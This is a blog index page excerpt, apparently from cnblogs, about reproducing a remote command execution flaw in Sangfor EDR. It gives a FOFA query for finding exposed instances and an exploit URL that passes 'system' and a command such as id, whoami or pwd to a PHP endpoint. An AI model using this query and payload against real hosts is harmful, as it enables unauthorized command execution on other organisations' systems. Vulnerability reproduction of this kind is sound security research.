会员
周边
众包
新闻
博问
闪存
赞助商
所有博客
当前博客
我的博客
我的园子
账号设置
简洁模式
...
退出登录
注册
登录
不想长大a
博客园
首页
联系
管理
2020年9月30日
深信服EDR远程命令执行复现
摘要: 先用fofa找到一个有漏洞的链接 body="终端检测响应平台" 漏洞利用 https://xxx.xxx.xx.xx/tool/log/c.php?strip_slashes=system&host=id 修改id值为执行的命令 使用whoami查询当前用户权限 使用pwd查询当前所在目录 查看当
阅读全文
posted @ 2020-09-30 14:53 不想长大a
阅读(572)
评论(0)
推荐(0)
编辑
公告